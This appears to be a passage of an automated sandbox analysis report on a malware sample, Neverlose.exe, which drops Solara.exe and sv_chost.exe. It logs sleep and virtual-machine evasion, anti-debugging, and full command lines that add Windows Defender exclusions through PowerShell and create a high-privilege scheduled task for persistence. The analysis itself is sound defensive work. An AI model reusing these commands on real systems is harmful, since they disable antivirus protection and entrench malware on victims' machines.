                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598168s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7272  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512  Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 7688  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908  Thread sleep count: 6457 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908  Thread sleep count: 3269 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944  Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 8000  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188  Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856  Thread sleep count: 2460 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856  Thread sleep count: 7028 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7488Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\Neverlose.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599091Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598730Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598616Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598495Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598351Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598168Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C0C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd na%SystemRoot%\system32\mswsock.dllServiceModel.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1770439761.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                  Source: Neverlose.exe, Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                  Source: Neverlose.exe, Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                  Source: Neverlose.exe, 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Users\user\Desktop\Neverlose.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Neverlose.exe | Thread information set: HideFromDebugger
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Neverlose.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                  Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: C:\Users\user\Desktop\Neverlose.exe | Queries volume information: C:\Users\user\Desktop\Neverlose.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Neverlose.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
